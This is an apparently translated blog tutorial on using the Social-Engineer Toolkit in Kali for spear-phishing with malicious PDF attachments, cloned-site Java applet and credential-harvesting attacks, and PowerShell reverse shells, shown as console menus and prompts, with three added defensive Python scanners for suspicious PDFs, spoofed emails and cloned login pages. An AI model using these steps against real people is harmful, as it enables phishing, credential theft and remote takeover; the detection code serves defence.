SET's social engineering attack methods

SET (Social-Engineer Toolkit)

An open source social engineering toolkit, usually used together with Metasploit.

GitHub: https://github.com/trustedsec/ptf (use it to update all your tools)

In Kali, enter:

setoolkit

Select the first item in the main menu to enter the Social-Engineering Attacks submenu.

1. Spear-Phishing Attack

We choose attack 1, the spear-phishing attack.

set> 1

The Spearphishing module allows you to specially craft email messages and send
 them to a large (or small) number of people with attached fileformat malicious
 payloads. If you want to spoof your email address, be sure "Sendmail" is in-
 stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
 flag to SENDMAIL=ON.

 There are two options, one is getting your feet wet and letting SET do
 everything for you (option 1), the second is to create your own FileFormat
 payload and use it in your own attack. Either way, good luck and enjoy!

   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template

  99) Return to Main Menu

set:phishing>

You can see that there are three options:

1) Perform a Mass Email Attack: a mass-mailing attack
2) Create a FileFormat Payload: create a file-format payload
3) Create a Social-Engineering Template: create a social-engineering template

We then choose the second option.

set:phishing>2
/usr/share/metasploit-framework/

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
   4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   7) Adobe Flash Player "Button" Remote Code Execution
   8) Adobe CoolType SING Table "uniqueName" Overflow
   9) Adobe Flash Player "newfunction" Invalid Pointer Use
  10) Adobe Collab.collectEmailInfo Buffer Overflow
  11) Adobe Collab.getIcon Buffer Overflow
  12) Adobe JBIG2Decode Memory Corruption Exploit
  13) Adobe PDF Embedded EXE Social Engineering
  14) Adobe util.printf() Buffer Overflow
  15) Custom EXE to VBA (sent via RAR) (RAR required)
  16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  17) Adobe PDF Embedded EXE Social Engineering (NOJS)
  18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  19) Apple QuickTime PICT PnSize Buffer Overflow
  20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  21) Adobe Reader u3D Memory Corruption Vulnerability
  22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>

In other words: choose the file-format exploit you want; the default is the PDF embedded EXE (option 13 in the list above).

We choose the third payload; SET then asks which connection method (shell type) to use.

set:payloads>3

   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

Here we choose option 4, the Windows x64 reverse TCP shell.

set:payloads>4
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]:
set:payloads> Port to connect back on [443]:

[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...

You are then asked for the listener address. Normally this would be a public IP so the listener is reachable from outside; here, in the lab, we simply use Kali's own IP.

 

After a short wait the payload is ready. Two options follow: keep the current filename, or rename it.

We choose the second (rename).

set:phishing>2
set:phishing> New filename:helloword.pdf
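
Before an attachment like the one just generated reaches a mailbox, a gateway or an analyst can triage its structure. The scanner below is an added example, not SET's or Metasploit's code: it flags the PDF features the "PDF Embedded EXE" payloads rely on (an embedded file, a /Launch or JavaScript action fired on open, a PE header at the start of a stream) and scores them; the sample PDFs and the weights are constructed assumptions.

```python
import re

# (key, regex, description, weight). Name objects must be followed by a PDF delimiter
# so that /JS does not also match a longer name beginning with /JS.
DELIM = rb"(?=[\s/\[<(>])"
INDICATORS = [
    ("EmbeddedFile", rb"/EmbeddedFiles?" + DELIM, "embedded file (attachment) object", 3),
    ("Launch", rb"/Launch" + DELIM, "/Launch action: asks the reader to run a program", 4),
    ("JavaScript", rb"/(?:JavaScript|JS)" + DELIM, "JavaScript action", 2),
    ("OpenAction", rb"/OpenAction" + DELIM, "action fired when the document opens", 2),
    ("AA", rb"/AA" + DELIM, "additional (automatic) actions", 1),
    ("MZ", rb"stream\r?\nMZ", "uncompressed PE header at the start of a stream", 3),
]
WEIGHTS = {key: weight for key, _, _, weight in INDICATORS}

def scan_pdf(data: bytes) -> dict:
    """Count each indicator in raw PDF bytes; return {'is_pdf', 'hits', 'score'}.
    First-pass triage only: objects hidden in compressed /ObjStm streams are invisible
    to a byte scan, so a low score never proves a file is safe."""
    if not data.lstrip().startswith(b"%PDF"):
        return {"is_pdf": False, "hits": {}, "score": 0}
    hits = {key: len(re.findall(pat, data)) for key, pat, _, _ in INDICATORS}
    hits = {key: n for key, n in hits.items() if n}
    return {"is_pdf": True, "hits": hits, "score": sum(n * WEIGHTS[k] for k, n in hits.items())}

def verdict(result: dict) -> str:
    """A lone /Launch (weight 4) is enough; a lone /OpenAction is common in benign files."""
    if not result["is_pdf"]:
        return "not-a-pdf"
    return "suspicious" if result["score"] >= 4 else "clean"

# Constructed sample, not a real exploit: the shape an "embedded EXE" PDF takes, with an
# open action that launches an attached file whose stream begins with a PE header.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /Names << /EmbeddedFiles 5 0 R >>
  /OpenAction << /S /Launch /F (attachment.exe) >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Type /EmbeddedFile /Length 2 >> stream
MZ
endstream endobj
5 0 obj << /Names [(attachment.exe) 4 0 R] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_PDF), ("clean", CLEAN_PDF)):
        r = scan_pdf(blob)
        print(name, verdict(r), r["score"], r["hits"])
```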

Next you choose between sending a single email and a mass mailing; we choose the first (single email).

set:phishing>1

Two options again: 1) a pre-defined template, 2) a one-time-use email template.

We choose the second.

set:phishing>2   
set:phishing> Subject of the email:
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:

Then choose whether the body is HTML or plain text (we choose p) and type the content.

set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: 君不见黄河之水天上来,奔流到海不复回。
君不见高堂明镜悲白发,朝如青丝暮成雪。
人生得意须尽欢,莫使金樽空对月。
天生我材必有用,千金散尽还复来。
烹羊宰牛且为乐,会须一Next line of the body: 饮三百Next line of the body: Next line of the body: Next line of the body: 杯。
岑夫子,丹丘生,将进酒,杯莫停。
与君歌一曲,请君为我倾耳听。(倾耳听 一作:侧耳听)
钟鼓馔玉不足贵,但愿长醉不愿醒。(不足贵 一作:何足贵;不愿醒 一作:不复醒)
古来圣Next line of the body: 贤皆寂Next line of the body: Next line of the body: Next line of the body: 寞,惟有饮者留其名。(古来 一作:自古;惟 通:唯)
陈王昔时宴平乐,斗酒十千恣欢谑。
主人何为言少钱,径须沽取对君酌。
五花马、千金裘,呼儿将出换美酒,与尔同销万古愁。
Next line of the body: Next line of the body: Next line of the body: Next line of the body:

Press Ctrl+C to finish the body, then enter the recipient's email address.

set:phishing> Send email to:[email protected]

Next, set up the sending account. The first option is Gmail; the second lets you use another mailbox, but that requires configuring an SMTP server.

set:phishing>1                                        
set:phishing> Your gmail email address:[email protected]
set:phishing> The FROM NAME user will see:

Nothing special after that; just follow the prompts.
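
On the receiving side, a spoofed-From mailing with a FileFormat attachment leaves the traces a mail filter can check: the SPF/DKIM/DMARC results in Authentication-Results, a Return-Path domain that does not match the From domain, and an attachment of a risky type. The triage function below is an added example built on Python's standard email module, not part of SET; the two messages are constructed on example.* domains, and the risky-extension list is an assumption.

```python
from email import message_from_bytes, policy
from email.utils import parseaddr
import re
# Extensions matching the FileFormat payload types SET offers, plus its script files (assumed list).
RISKY_EXT = {".exe", ".pdf", ".rtf", ".doc", ".docm", ".hta", ".ps1", ".rar", ".zip", ".mcl"}

def domain(addr: str) -> str:
    return parseaddr(addr)[1].rpartition("@")[2].lower()  # bare domain of a header value

def auth_results(msg) -> dict:
    """Collapse Authentication-Results headers into {'spf': 'fail', 'dkim': 'none', ...}."""
    out = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for m in re.finditer(r"\b(spf|dkim|dmarc)=(\w+)", str(hdr)):
            out[m.group(1)] = m.group(2).lower()
    return out

def triage(raw: bytes) -> list:
    """Findings for one raw message: non-passing auth, From/Return-Path misalignment, risky attachments."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings, auth = [], auth_results(msg)
    for mech in ("spf", "dkim", "dmarc"):
        if auth.get(mech, "none") != "pass":
            findings.append(f"{mech}={auth.get(mech, 'none')}")
    from_dom, rp_dom = domain(str(msg.get("From", ""))), domain(str(msg.get("Return-Path", "")))
    if rp_dom and rp_dom != from_dom:
        findings.append(f"From domain {from_dom} != Return-Path domain {rp_dom}")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = name[name.rfind("."):] if "." in name else ""
        if ext in RISKY_EXT:
            findings.append(f"risky attachment {name} ({part.get_content_type()})")
    return findings

# Constructed messages: SAMPLE mimics a spoofed-From mail carrying the renamed attachment
# from the walkthrough; CLEAN is an ordinary authenticated message from the same domain.
SAMPLE = b"""Return-Path: <bounce@mail.example.net>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=mail.example.net; dkim=none; dmarc=fail header.from=bank.example.com
From: "IT Helpdesk" <helpdesk@bank.example.com>
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: application/pdf
Content-Disposition: attachment; filename="helloword.pdf"

JVBERi0xLjQK
--b1--
"""
CLEAN = b"Return-Path: <alice@example.com>\nAuthentication-Results: mx.example.com; spf=pass; dkim=pass; dmarc=pass\nFrom: alice@example.com\nTo: bob@example.com\n\nLunch at noon?\n"
```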

2. Website Attack

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

We choose the first (Java Applet Attack Method).

set:webattack>1

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

We choose the second (Site Cloner), then enter the IP address.

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]: 


Then choose how the applet is signed:

1. Make my own self-signed certificate applet.
2. Use the applet built in SET.
3. I have my own code signing certificate or applet

We choose 2, then enter the URL to clone.

set:webattack> Enter the url to clone:

After entering the URL, choose the shell interaction mode.

Then we choose the first option.

Sometimes the attack fails; it is constrained by whether the target's browser can run the Java applet.

 

Next, the Credential Harvester Attack Method.

We choose 3.

Then choose 2 (Site Cloner).

SET then captures whatever the user enters on the cloned page.
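
The Java applet and credential-harvester pages described above share traits that a browser extension or a URL-scanning service can look for: a cloned page is served from the attacker's host while its stylesheets, scripts and links still point at the brand's site, an applet tag has been injected, and a password form is served without TLS. The inspector below is an added example, not SET's code; the two pages and the lab address 198.51.100.7 are constructed.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class CloneInspector(HTMLParser):
    """Collect the traits a cloned login page or an applet page tends to show."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.page_host = page_url, urlsplit(page_url).hostname
        self.link_hosts, self.findings, self.password_field = Counter(), [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        # A cloner leaves resource and link hosts on the original site; only the page host changes.
        for key in ("href", "src"):
            if key in a:
                host = urlsplit(urljoin(self.page_url, a[key])).hostname
                if host:
                    self.link_hosts[host] += 1
        if tag == "form":
            host = urlsplit(urljoin(self.page_url, a.get("action", ""))).hostname
            if host != self.page_host:
                self.findings.append(f"form posts off-site to {host}")
        elif tag == "applet" or a.get("archive", "").lower().endswith(".jar"):
            self.findings.append(f"java {tag}: {a.get('code') or a.get('archive')}")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_field = True

def inspect(page_url: str, html: str) -> list:
    """Return findings for a page fetched from page_url; an empty list means none."""
    p = CloneInspector(page_url)
    p.feed(html)
    if p.password_field and urlsplit(page_url).scheme != "https":
        p.findings.append("password field on a page served over plain http")
    top = p.link_hosts.most_common(1)
    if top and top[0][0] != p.page_host and p.link_hosts[p.page_host] == 0:
        p.findings.append(f"served from {p.page_host} but its links point to {top[0][0]}")
    return p.findings

# Constructed pages: SAMPLE_HTML is a cloned login page served from a lab host (resources still
# on the brand's site, an applet injected, the form posting back to the serving host);
# LEGIT_HTML is the same form as the real site serves it over TLS.
SAMPLE_HTML = """<html><head><link rel="stylesheet" href="https://login.example.com/site.css">
<script src="https://login.example.com/app.js"></script></head><body><img src="https://login.example.com/logo.png">
<applet code="Update.class" archive="update.jar" width="1" height="1"></applet>
<form method="post" action="/index.php"><input name="user"><input type="password" name="pass"></form>
<a href="https://login.example.com/help">Help</a></body></html>"""
LEGIT_HTML = """<html><body><img src="/logo.png"><form method="post" action="/login">
<input name="user"><input type="password" name="pass"></form></body></html>"""
```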

Next, the Multi-Attack Web Method.

The so-called multi-attack lets you combine several of the attack methods above.

From the website attack menu, choose 6 to enter the multi-attack and enter the parameters.

In fact, it is just the methods above combined, so I won't demonstrate it here.

 

3. Wireless Access Point Attack

1. Requires a wireless network card

2. In a virtual machine, USB wireless network card support is needed

3. DNS hijacking must be enabled

4. QRCode Generator Attack

The QR code attack generates a QR code from a URL; the content behind the link must be built yourself.

 

5. PowerShell Attack

Uses the PowerShell feature of the Windows system.

Older versions of Windows cannot run PowerShell.

For PowerShell basics, see:

https://mp.weixin.qq.com/s/LR6OL_mARk6YBHcZAbKY3Q

 

Select item 9, enter the listener IP address and port, and SET generates the PowerShell script; send it to the target host and choose yes to start the listener.

Run the .ps1 file on the target host.

The listener on Kali receives the reverse shell.

 

The other attack vectors are not demonstrated here; if you are interested, try them yourself.


Source: blog.csdn.net/weixin_43198291/article/details/112210356